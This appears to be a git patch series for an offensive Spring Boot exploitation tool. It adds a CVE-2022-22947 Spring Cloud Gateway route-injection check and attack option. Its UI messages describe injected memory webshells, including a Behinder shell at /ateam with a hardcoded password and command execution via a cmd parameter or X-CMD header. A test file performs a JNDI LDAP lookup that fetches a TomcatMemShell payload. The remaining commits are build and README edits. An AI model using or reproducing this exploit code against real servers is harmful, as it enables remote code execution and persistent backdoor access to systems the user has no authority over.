System.out.println("SpringCloudGatewayRCE " + System.currentTimeMillis()); + try { + SpringCloudGatewayRCEEXP exp = new SpringCloudGatewayRCEEXP(); + return exp.exp(target); + }catch (Exception e){ + e.printStackTrace(); + } + } + + }catch (Exception e){ + e.printStackTrace(); return false; } @@ -104,8 +116,5 @@ public boolean gadgetSend(String target, String vps, String gadget, String[] por } - public void setPOCRequest(String target, String vps, String gadget,String echo){ - - } } diff --git a/src/main/java/com/drops/poc/SpringBootInfoCheck.java b/src/main/java/com/drops/poc/SpringBootInfoCheck.java index caf9bd8..635d651 100644 --- a/src/main/java/com/drops/poc/SpringBootInfoCheck.java +++ b/src/main/java/com/drops/poc/SpringBootInfoCheck.java @@ -108,11 +108,14 @@ void checkEnvPointV1(String addr){ JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC(); JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC(); logbackRCEPOC.hasJolokiaLogbackRCE(url); - Boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url); + boolean f = realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url); if(!f){ H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC(); if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){ + SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC(); + if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){ + } } } @@ -133,10 +136,12 @@ void checkEnvPointV2(String addr){ JolokiaLogbackRCEPOC logbackRCEPOC = new JolokiaLogbackRCEPOC(); JolokiaRealmJNDIRCEPOC realmJNDIRCEPOC = new JolokiaRealmJNDIRCEPOC(); if(!logbackRCEPOC.hasJolokiaLogbackRCE(url) || realmJNDIRCEPOC.hasJolokiaRealmJNDIRCE(url)){ - H2DatabaseConsoleJNDIRCEPOC h2 = new H2DatabaseConsoleJNDIRCEPOC(); if (!h2.hasH2DatabaseConsoleJNDIRCE(url)){ + SpringCloudGatewayRCEPOC gatewayRCEPOC = new SpringCloudGatewayRCEPOC(); + if (!gatewayRCEPOC.hasSpringCloudGatewayRCEPOC(addr)){ + } } } diff --git a/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java b/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java new file mode 100644 index 0000000..0b60167 --- /dev/null +++ b/src/main/java/com/drops/poc/SpringCloudGatewayRCEPOC.java @@ -0,0 +1,63 @@ +package com.drops.poc; + +import com.drops.entity.ControllersFactory; +import com.drops.ui.MainController; +import com.drops.utils.HTTPUtils; +import com.drops.utils.StringRandom; +import com.drops.utils.Utils; + +import java.util.Locale; + +/** + * @ClassName: SpringCloudGatwayRCEPOC + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 16:55 + * @Version: v1.0.0 + * @Description: + CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE + **/ +public class SpringCloudGatewayRCEPOC { + + private final MainController mainController; + + public SpringCloudGatewayRCEPOC( ) { + this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName()); + + } + + public boolean hasSpringCloudGatewayRCEPOC(String target) { + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"%s\",\n" + + " \"order\": 0\n" + + "}", endpoint, endpoint, target); + + String re1 = HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); + String re2 = HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); + String re3 = HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); + System.out.println("re1 = " + re1); + System.out.println("re2 = " + re2); + System.out.println("re3 = " + re3); + if (re3.toLowerCase().contains(endpoint.toLowerCase())) { + this.mainController.logTextArea.appendText(Utils.log("存在SpringCloudGatewayRCEPOC漏洞\n")); + return true; + }else { + this.mainController.logTextArea.appendText(Utils.log("不存在SpringCloudGatewayRCEPOC漏洞\n")); + } + HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint); + HTTPUtils.postRequestV1(target , "actuator/gateway/refresh"); + return false; + } + + + + + + +} diff --git a/src/main/java/com/drops/ui/MainController.java b/src/main/java/com/drops/ui/MainController.java index 2eb5be4..fed9766 100644 --- a/src/main/java/com/drops/ui/MainController.java +++ b/src/main/java/com/drops/ui/MainController.java @@ -124,7 +124,7 @@ private void initConnect() { private void initComBoBox() { - ObservableList gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"}); + ObservableList gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE", "SpringCloudGatewayRCE"}); this.gadgetOpt.setPromptText("SnakeYAMLRCE"); this.gadgetOpt.setValue("SnakeYAMLRCE"); this.gadgetOpt.setItems(gadgets); @@ -303,11 +303,19 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) { boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(), this.vps.getText(),this.gadgetOpt.getValue(),this.getPorts()); if(flag){ - if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){ - this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !")); - this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb")); + System.out.println(this.gadgetOpt.getValue()); + if (this.gadgetOpt.getValue().equalsIgnoreCase("SpringCloudGatewayRCE")){ + this.logTextArea.appendText(Utils.log(" SpringCloudGateway 漏洞利用成功")); + this.logTextArea.appendText(Utils.log(" 请自行检查是NettyMemshell 还是 SpringRequestMappingMemshell!")); + this.logTextArea.appendText(Utils.log(" 如果是SpringRequestMappingMemshell,/?cmd={cmd} 执行命令")); + this.logTextArea.appendText(Utils.log(" 如果是NettyMemshell,header头 X-CMD: {cmd} 执行命令")); }else { - this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); + if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){ + this.logTextArea.appendText(Utils.log(" 冰蝎内存马注入成功 !")); + this.logTextArea.appendText(Utils.log( " /ateam 密码:ateamnb")); + }else { + this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); + } } }else { this.logTextArea.appendText(Utils.log("漏洞利用失败!\t")); diff --git a/src/main/java/com/drops/utils/HTTPUtils.java b/src/main/java/com/drops/utils/HTTPUtils.java index edec81f..e2bed3c 100644 --- a/src/main/java/com/drops/utils/HTTPUtils.java +++ b/src/main/java/com/drops/utils/HTTPUtils.java @@ -33,6 +33,21 @@ public HTTPUtils(int Timeout){ HttpGlobalConfig.setTimeout(Timeout); } + public static HttpResponse deleteRequest(String target, String s) { + String url = URLUtil.normalizeURL(target); + Proxy proxy = (Proxy) MainController.currentProxy.get("proxy"); + HttpResponse result = null; + if (proxy == null){ + result = HttpRequest.delete(url).execute(); + }else { + result = HttpRequest.delete(url).setProxy(proxy).execute(); + } + + return result; + } + + + public void setTimeout(int Timeout){ HttpGlobalConfig.setTimeout(Timeout); } diff --git a/src/main/java/com/drops/utils/StringRandom.java b/src/main/java/com/drops/utils/StringRandom.java new file mode 100644 index 0000000..d344e92 --- /dev/null +++ b/src/main/java/com/drops/utils/StringRandom.java @@ -0,0 +1,30 @@ +package com.drops.utils; + +/** + * @ClassName: StringRandom + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:43 + * @Version: v1.0.0 + * @Description: + **/ +public class StringRandom { + + /** + * @Description: 获取随机字符串 + * @Param: [length] + * @return: java.lang.String + * + */ + public static String getRandomString(int length) { + String base = "abcdefghijklmnopqrstuvwxyz0123456789"; + int size = base.length(); + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + int number = (int) (Math.random() * size); + sb.append(base.charAt(number)); + } + return sb.toString(); + } + +} diff --git a/src/test/java/0cat.class b/src/test/java/0cat.class new file mode 100644 index 0000000000000000000000000000000000000000..5e6976b8f12627733e45d9ed30a89bb8b0af7f7a GIT binary patch literal 9364 zcmb7J3w%`Nl|Lu*xHprV1O@^Os33xb$zym66GRgT5={ao0Ss91X67atn9K|_6OvFL zwOFlHYpu4{_oFISZ3UGH5ua_$>aiy6<;)ysr|;?xk+q`@tdqn@onkadr33 zzVn@PzVrB>^IhKhpY{3R`X0jQYD_M1l=r9@NA9e_~=|g8Ni+A`e+u<6hoi5;tekvo{!juv&3b- zxGeBd1E1}qb-YlcCpA7t<3&0z76a$%yhp(_@wimuppr>~R_8jMt`tM{J`V9Raapd@ z)k2vSWxSGC>AYIwH5#9%@mihNm2#LH1l4*mdwwZz;0t_wAvbE=R7S7yMx8eacFltQ zGC{pr=ZkdSqSFgHw+Opjtn(#eBdt2O2|4W=Z}rh0`nZg@@ufO_q;p3ZcXF4`+kL!) zcWQi@k9xUVyzJ6=x8Q#{j6|Q5@n?9CkN5Hw!e*u*=n+p5K@t_Fu!N*uo%?j|*XTB# zV><8cdb4vsjr%;tv~^(6%4c_awc*zxn!}-tl|c4^vz4nlhwk`}oq#y>P=pOkdfLjQ zl8KDPRQ;)o6eU)bL^4c%Ngs-viM~*0HXTd!VaBy>D9Yqcnc03O@A_CGmfe8S>ZLm{ zx-l7roXXZ%!fGEJ=&{mWW=|X={?=r~jPEehG4XB>y0iT;DP=g+Wc9}qQ7gSU7SCE~ zNSUj2RkAn6%}k~>X@a0Zh~Ws+Y=>^ndCc}PRaNh9T3Sp2w%miQ?QVj;1JTt?=Q^d> zJ9I89Y+4xqOvNu_MF!Kc>`181%4EzwYg4Qb9ud5;7gySXbILojW@LYxnUWhttRc5x zE4ajrgQ&_Wb!*Q)E0S$kx(f_os49oj&BGBZm5n76!s^MMeG?sGF9hG@U^X=fv2z@2 zmF7)@y}i<$o~+ro7oz3elr2e9kl2whl$p+0;b^|cgj1tt)?}ko+rhpd+!kklhym4k zcT7rm2%QnFOaaGC+UkvCx1r53D;@;}VpGQR3P=%Q3g=kEOr>Ttsv?1DX7!W~F?waB zz{XN{cfuTi^*DxK3$#(Qa6>xVW@Y=6h}gMP=%MDINNIr`Q$;UAQHck87|mCh#ETJ0 zCbHIWR&D_vF;l5{EMf{bZB#Q%b*;&CU&u_Ek$x+LIWrzhn4w5AZG{>qkwbcACTk|5 zW;$Bn5Ij8xY|2TC}mER#)3y);e&IyQ~KMlocL(UM45Y3U>j8wyIh zj3bHKxpVy@dnrU!*mzS=^sJ)QHvHK0Sm9OrFwH8WRC0v+ilSY5&^4F_)TMxS8Xw3* zc~avvYJny)%vZElS6XiM63#)IEc)qc0eA zC0%9E)pQMvxV>w0-CBb_N7phoSI$>7iOmDpd~CiD+i8GJQgWANwrT7y5&hYh}tzW^i>l0yTid!eRSUkgy6 z&q^D7J*en9zQN!x@{I<6ieo0=l2q2slbw|aidhh7lrs2cy4|3!((oo!ayakrh1k%f zZiCS0%Jp>sCxJJp@B?v!Z{aT+d@C;WEInuNSNJxR!pTfxanwqzZ0_jT+7S+g76{U> zLPfFYcD_U7uNnMx!Rt;KlD{D?ck$f@-^2GZEfx&N5y25*ve~es8|CxU=<tZadG<@lz?qw^xjkm2>3533RcWH9(4ewe9DE>{u_ z{w6;H05SMce3ドルz_{J6p2;wJzs20zJ9A=VHD!m3O)e*jdYgE}pB5iG+vQ<2j)y>o9= zk&#H;YC`@Yb|rjk{B483!%rK0l#ju?{EWuW8vGm|*EnbJD4&?HdlfAPkMZ-^dao>o zP8ドルW)_#{7Q@C*DjQwS>5t1?udO%9+E)e8mcqgE!8jseKh^+Q%qy~;xX1=AwOihSV$ zc`BY9agvq8)@qeNZG&IrmtfP*!AJxsW$?@N9NGy*u)vI`Ei*c@z#2wD!sILbDhjmp zqqN2rGt&>*z$Jsf%ilwW0I7xy{yx8k1ZZsT)cAFgkZ%BSWEkZ^IFqs>p-wA;mg^F0 zq!Vu<4}w0lfzot_s<^2%_$~e+kkh__`5ldawbni42kq<(cxd^?kqzxbbgrkx<)0aj z58Z3E&ghmXVUs zbaF`b^HWPIWUtEi!r`Q-=%FW^sHobLthP*NO`LOpk6i%ErLy_rmIvEdGSsrQ0Jf9Z z*eW;(%Ayt;Jxh84w!wj+rN!B5$_W(Hc~aceUB5z|mIN|55kV?1pQ?naVmvhi@Yj(` zO(R*+in*(oihApfTZuk#y27Cf&8&AYg$^9tHKik3a&J@~I`B~4f`bl5^lVZ=g6QKX z>_ZJhP-$kcCnHaBi0kT!n;j>DHd~OdqI#g&%gW$MWV=REP+-Er#a<$w&lh6hx4;j4 z@Yb9_JAtDjltXW9CD3};p582uvt{A1QuqHPmqku&3_9<`kxb}3jayh2jz!^>)t&&A z3gn5y0N<1#!o4>>n1RW0o=FN&7GAMKV@95()HNR#S}fC;PMhdf;3XX1wBBS|wXlmn zMg2U7=@0>ch?{9En$NZir&#Mecd50`FrApM*rzv^IGEgzEv3ドル$vJY%dUiOfanLPyb zbm(RuEI!REc}4PPyK)3Yqbvw9`3b;Xy-UQ33!IA%-oH-~VWeUlTVOk694;qPzz9`X zHW?|I);MjFkKifWQYXTK;lin^d7+S_@`?m4@9b*q=xS-dXz#X;=545^Q=Z}`t^#it zEQK#RPStFaDCm%Jmp2kj*yW_OH!ZoGVg25bo06@qVq zPX}yPHNc9hIS{G?(xe$!Ms$_pJ0qZ1d<96dazwiy4mhnpoisnwwqin^b->IrCQIx` z?nd@^p>~1Of{DGyg;um_AD$TyX%!w|N4ドルP z6}k=crQ(!qvw8xoT%cXat$yPKmABOfb5!BNr7}m;PSW&lcWsXRqcmgMv>eTJiECBs z5puWH90iLKs-tBPKrW%cyffstLDa0J*|ZMMZGdgp!(QiO#RYUB{XIzkW2R(u(xAf6D_ZrB zd5%`xMGI?Qp_TY+3)Z?;yh5u)+Sa=9v>Lg4gpT{yoS^eC>0j%5k=ErXT!VW~umsVfQhZX(^c$h5NGjnv}zRlzu@U6x`W^Vy-z z;L`0_wG-)b864J)^>J|6MHcPG)8*i_2WH<3q`lx{yr;i6^ecmdebw7yc?xbkmhsh= z=uapiU3@w6+z&u|f}VsELrA};=-YU@7Ej-yr=jQVfVrcP&(VGoDB9M(9jbGTFlkiXgCtbhkY zaMk9pH{hK-DaJ5+QCRbD@wbR|dO#OW4(I{x8M-(}m(8$bYE{wvMnb;KS<9fg>d0NVI;ZV$%gS94_;3N6?1Lj*t;H{5#}x zKodIc%r7?rMnEe>vPgh%xob^DRYjourH83GP+nEBB3v0L^Izs%QCV2AH9Rda4d~K+ z7x@Kopxm{h6PG|`=XDi)d9OhszwJWkr zfYDJ@nF{E4l*Z_J?EM{RbQ0NB27M0D3m7w?)gF2gT+1PErsU_NMchL#$vj)ad+B9J z^HPv6r&j^c8r5+(eGjubY`=rPPd`8gBRTBc^YJx+>9>$T246)#q_>eo(|H)O1vJm* zH2nxq3Yrg-ehOwXWCp&g(T^20YxEP1eyY*WzryW!E6?ZiU(^!q-qa z)IAE{9)lmBL1XwVBKkQ{8a)^rtYBc=|K?bI32l%8%$TV8)rqj0fm1!9gJJe9<1=n?z%p zztZThHToNk{#K*ElTPtU+k3(4@97`F8ee0T_32koL)7~Le^yl1TK^zGZe6#_zqK<* z9q3sO;Ju;SRfAU)*@O5y+U6euZF`-6*hV9^fhb=!N1QwY?#UeF?t)ZPu<2z=l5o-u z;=TqkUyEp8fd*wWy)Nx0+7mCDL{+g?05!yu3-e3ppOKGltY|D$r-6bk2k2jr1FD5Y zC%j)29%mT-lK#~;#A?VFmge#EfNGuJmI|oWnG1{=iTx`u&NCBM{rAG*qed{AirKr8 cnL0$|nU&CgNZJ2MZ{Y63!q+%KuX{`X4+rI^wg3PC literal 0 HcmV?d00001 diff --git a/src/test/java/Client.java b/src/test/java/Client.java new file mode 100644 index 0000000..982423b --- /dev/null +++ b/src/test/java/Client.java @@ -0,0 +1,32 @@ +/** + * @ClassName: Client + * @Description: TODO + * @Author: Summer + * @Date: 2021/8/2 10:53 + * @Version: v1.0.0 + * @Description: + **/ +import java.io.IOException; +import java.net.Socket; +import java.net.UnknownHostException; +import java.util.Hashtable; + +import javax.naming.Context; +import javax.naming.NamingEnumeration; +import javax.naming.directory.Attribute; +import javax.naming.directory.Attributes; +import javax.naming.directory.DirContext; +import javax.naming.directory.InitialDirContext; +import javax.naming.directory.SearchControls; +import javax.naming.directory.SearchResult; + +public class Client { +// public static void main(String[] args) { +// demo d = new demo(); +// d.setDemo(); +// if (d.isFlag()){ +// System.out.println("sad"); +// } +// } +} + diff --git a/src/test/java/LdapClient.java b/src/test/java/LdapClient.java new file mode 100644 index 0000000..676615a --- /dev/null +++ b/src/test/java/LdapClient.java @@ -0,0 +1,170 @@ +/** + * @ClassName: LdapClient + * @Description: TODO + * @Author: Summer + * @Date: 2021/8/2 11:00 + * @Version: v1.0.0 + * @Description: + **/ +import java.util.Properties; +import javax.naming.NamingException; +import javax.naming.NamingEnumeration; +import javax.naming.directory.*; +import javax.naming.ldap.*; + +/** + * Created by baikai on 8/17/16. + */ +public class LdapClient { + + private String ldapUrl; + private String ldapUserDN; + private String ldapPwd; + + public LdapClient(String ldapUrl, String ldapUserDN, String ldapPwd){ + this.ldapUrl = ldapUrl; + this.ldapUserDN = ldapUserDN; + this.ldapPwd = ldapPwd; + } + + /** + * Create LDAP user + * @param userName + * @param password + * @param uidNumber + * @param gidNumber + */ + public void createLDAPUser(String userName, String password, String uidNumber, String gidNumber){ + LdapContext context = this.initLDAPContext(); + Attributes matchAttrs = new BasicAttributes(true); + BasicAttribute objclassSet = new BasicAttribute("objectClass"); + objclassSet.add("account"); + objclassSet.add("posixAccount"); + matchAttrs.put(objclassSet); + matchAttrs.put(new BasicAttribute("uid", userName)); + matchAttrs.put(new BasicAttribute("cn", userName)); + matchAttrs.put(new BasicAttribute("uidNumber", uidNumber)); + matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); + matchAttrs.put(new BasicAttribute("homeDirectory", "/home/" + userName)); + matchAttrs.put(new BasicAttribute("userpassword", password)); + matchAttrs.put(new BasicAttribute("description", "LDAP user.")); + + try { + context.bind("uid=" + userName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Create LDAP user group + * @param groupName + * @param password + * @param gidNumber + */ + public void createLDAPUserGroup(String groupName, String password, String gidNumber){ + LdapContext context = this.initLDAPContext(); + Attributes matchAttrs = new BasicAttributes(true); + matchAttrs.put(new BasicAttribute("objectclass", "posixGroup")); + matchAttrs.put(new BasicAttribute("cn", groupName)); + matchAttrs.put(new BasicAttribute("gidNumber", gidNumber)); + matchAttrs.put(new BasicAttribute("userPassword", password)); + try { + context.bind("cn=" + groupName + ",ou=People,dc=asiainfo,dc=com", null, matchAttrs); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Delete LDAP user + * @param userName + */ + public void deleteLDAPUser(String userName){ + LdapContext context = this.initLDAPContext(); + try { + context.unbind(userName); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Delete LDAP user group + * @param groupName + */ + public void deleteLDAPUserGroup(String groupName){ + this.deleteLDAPUser(groupName); + } + + /** + * Modify LDAP user attribute with new value + * @param userName + * @param attributeName + * @param attributeNewValue + */ + public void updateLDAPUserAttribute(String userName, String attributeName, String attributeNewValue){ + LdapContext context = this.initLDAPContext(); + ModificationItem[] mods = new ModificationItem[1]; + mods[0] = new ModificationItem(context.REPLACE_ATTRIBUTE, new BasicAttribute(attributeName, attributeNewValue)); + try{ + context.modifyAttributes(userName, mods); + }catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + } + + /** + * Search LDAP users by user dn and filter + * @param userName + * @param filter + * @return NamingEnumeration + */ + public NamingEnumeration searchLDAPUser(String userName, String filter){ + NamingEnumeration searchResults = null; + LdapContext context = this.initLDAPContext(); + SearchControls ctrl = new SearchControls(); + ctrl.setSearchScope(SearchControls.SUBTREE_SCOPE); + try { + searchResults = context.search(userName, filter, ctrl); + } catch (NamingException e) { + e.printStackTrace(); + }finally { + this.closeLdapContext(context); + } + return searchResults; + } + + private LdapContext initLDAPContext(){ + LdapContext context = null; + Properties mEnv = new Properties(); + mEnv.put(LdapContext.AUTHORITATIVE, "true"); + mEnv.put(LdapContext.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); + mEnv.put(LdapContext.PROVIDER_URL, this.ldapUrl); + mEnv.put(LdapContext.SECURITY_AUTHENTICATION, "simple"); + mEnv.put(LdapContext.SECURITY_PRINCIPAL, this.ldapUserDN); + mEnv.put(LdapContext.SECURITY_CREDENTIALS, this.ldapPwd); + try { + context = new InitialLdapContext(mEnv,null); + } catch (NamingException e) { + e.printStackTrace(); + } + return context; + } + + private void closeLdapContext(LdapContext context){ + try { + context.close(); + } catch (NamingException e) { + e.printStackTrace(); + } + } +} \ No newline at end of file diff --git a/src/test/java/gateway.java b/src/test/java/gateway.java new file mode 100644 index 0000000..35d6183 --- /dev/null +++ b/src/test/java/gateway.java @@ -0,0 +1,37 @@ +import com.drops.utils.StringRandom; + +/** + * @ClassName: gateway + * @Description: TODO + * @Author: Summer + * @Date: 2022年4月17日 19:46 + * @Version: v1.0.0 + * @Description: + **/ +public class gateway { + public static void main(String[] args) { + String endpoint = "s" + StringRandom.getRandomString(5); + String body = String.format("{\n" + + " \"id\": \"%s\",\n" + + " \"filters\": [{\n" + + " \"name\": \"AddResponseHeader\",\n" + + " \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + + " }],\n" + + " \"uri\": \"http://example.com\",\n" + + " \"order\": 0\n" + + "}", endpoint, endpoint); + + System.out.println(body); + + + String res = "Response Headers: \n" + + " null=[HTTP/1.1 200 OK]\n" + + " Content-Length=[7]\n" + + " Content-Type=[text/html;charset=UTF-8]\n" + + "Response Body: \n" + + " s0gjvh"; + System.out.println(res.contains("s0gjvh")); + + } + +} diff --git a/src/test/java/spel.java b/src/test/java/spel.java new file mode 100644 index 0000000..ee185f8 --- /dev/null +++ b/src/test/java/spel.java @@ -0,0 +1,31 @@ +import javax.naming.InitialContext; +import javax.naming.NamingException; +import java.lang.reflect.InvocationTargetException; + +/** + * @ClassName: spel + * @Description: TODO + * @Author: Summer + * @Date: 2021年8月23日 11:39 + * @Version: v1.0.0 + * @Description: + **/ +public class spel { + public static void main(String[] args) { + try { +// javax.naming.InitialContext context = new InitialContext(); +// context.lookup("ldap://127.0.0.1:1389/basic/TomcatMemShell3"); + + java.lang.Class.forName("javax.naming.InitialContext").getMethod("lookup", String.class).invoke(Class.forName("javax.naming.InitialContext").newInstance(),"ldap://127.0.0.1:1389/basic/TomcatMemShell3"); +// new javax.naming.InitialContext().lookup(""); + } catch ( ClassNotFoundException | NoSuchMethodException e) { + e.printStackTrace(); + } catch (InvocationTargetException e) { + e.printStackTrace(); + } catch (IllegalAccessException e) { + e.printStackTrace(); + } catch (InstantiationException e) { + e.printStackTrace(); + } + } +} From 04b82d66246e868a97dea50c0ae7b05abc1d7417 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:28:57 +0800 Subject: [PATCH 2/8] .gitignore --- .gitignore | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..1735804 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +target/** +.idea/** \ No newline at end of file From eb1359dc9633bf27774d60a5b51624ee5ef4989a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:41:04 +0800 Subject: [PATCH 3/8] Update maven.yml --- .github/workflows/maven.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index c0438c9..ec7fc5d 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml @@ -24,7 +24,7 @@ jobs: java-package: jdk+fx - name: Build with Maven run: - mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V -X - name: Create Release id: create_release uses: SummerSec/create-release@master @@ -56,6 +56,6 @@ jobs: GITHUB_TOKEN: ${{secrets.RELEASE}} with: upload_url: ${{ steps.create_release.outputs.upload_url }} - asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar - asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_path: /home/runner/work/SpringBootExploit/SpringBootExploit/target/SpringBootExploit-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar + asset_name: SpringBootExploit-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar asset_content_type: application/java-archive From 2a68ab30ead424910df35c3164d8b148a59e2883 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:41:47 +0800 Subject: [PATCH 4/8] Update maven.yml --- .github/workflows/maven.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index ec7fc5d..18d80da 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml @@ -2,11 +2,11 @@ name: Release Maven -on: - push: - tags: - - '*' -#on: [push] +# on: +# push: +# tags: +# - '*' +on: [push] From bdacfb5cb64170a3c84a1a0d233569373932dd3a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 21:43:49 +0800 Subject: [PATCH 5/8] pom.xml --- .idea/compiler.xml | 2 +- pom.xml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.idea/compiler.xml b/.idea/compiler.xml index 10d5eae..7626265 100644 --- a/.idea/compiler.xml +++ b/.idea/compiler.xml @@ -16,7 +16,7 @@ \ No newline at end of file diff --git a/pom.xml b/pom.xml index 9d6fb69..e62b68a 100644 --- a/pom.xml +++ b/pom.xml @@ -24,9 +24,9 @@ 7 7 UTF-8 - - D:/java/jre/lib/rt.jar;D:/java/jre/lib/jce.jar - + + + From ae6b6d769eae7046281772324459b3d94afdcf8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= <47944478+summersec@users.noreply.github.com> Date: 2022年4月17日 21:47:30 +0800 Subject: [PATCH 6/8] Update maven.yml --- .github/workflows/maven.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/.github/workflows/maven.yml b/.github/workflows/maven.yml index 18d80da..c17120d 100644 --- a/.github/workflows/maven.yml +++ b/.github/workflows/maven.yml @@ -2,11 +2,11 @@ name: Release Maven -# on: -# push: -# tags: -# - '*' -on: [push] +on: + push: + tags: + - '*' +# on: [push] @@ -24,7 +24,7 @@ jobs: java-package: jdk+fx - name: Build with Maven run: - mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V -X + mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V - name: Create Release id: create_release uses: SummerSec/create-release@master From 697cb17e1a1546fc7ca230e61eeeab5a80beaac9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=A4=8F=E5=A4=A9?= Date: 2022年4月17日 22:08:02 +0800 Subject: [PATCH 7/8] jndiexploit --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index b8ab2f4..bf779bc 100644 --- a/README.md +++ b/README.md @@ -46,7 +46,7 @@ 1. 从[releases](https://github.com/0x727/SpringBootExploit/releases)下载最新版Spring Boot Exploit压缩包,配合[JNDIExploit](https://github.com/0x727/JNDIExploit)使用。(:star:推荐) 2. 1. git clone https://github.com/0x727/SpringBootExploit - 2. git clone https://github.com/0x727/JNDIExploit + 2. git clone https://github.com/0x727/JNDIExploit (目前不对外开放) 3. mvn clean package -DskipTests 分别打SpringBootExploit包和JNDIExploit From 2a56ec19ee2c69195bbe7ee950cb9c78f60463ac Mon Sep 17 00:00:00 2001 From: SummerSec <47944478+summersec@users.noreply.github.com> Date: Mon, 7 Nov 2022 10:30:45 +0800 Subject: [PATCH 8/8] Update README.md update image links --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index bf779bc..5de8b2e 100644 --- a/README.md +++ b/README.md @@ -60,19 +60,19 @@ -![image-20210812105637728](https://gitee.com/samny/images/raw/master/summersec//5u57er5ec/5u57er5ec.png) +![image](https://user-images.githubusercontent.com/47944478/200214227-e6c61ef1-6068-4553-a083-0c2d203591b1.png) 3. 漏洞利用 建议首先点击检测环境,会自动判断是否存在漏洞。漏洞验证方法是Check list的方法,如果有更好的方法可以提交工单会考虑添加。 - ![image-20210812110100966](https://gitee.com/samny/images/raw/master/summersec//1u01er1ec/1u01er1ec.png) + ![image](https://user-images.githubusercontent.com/47944478/200214192-796332cf-fd56-4f30-b624-e17d2137aa8c.png) + 4. 漏洞利用,目前只支持内存马注入 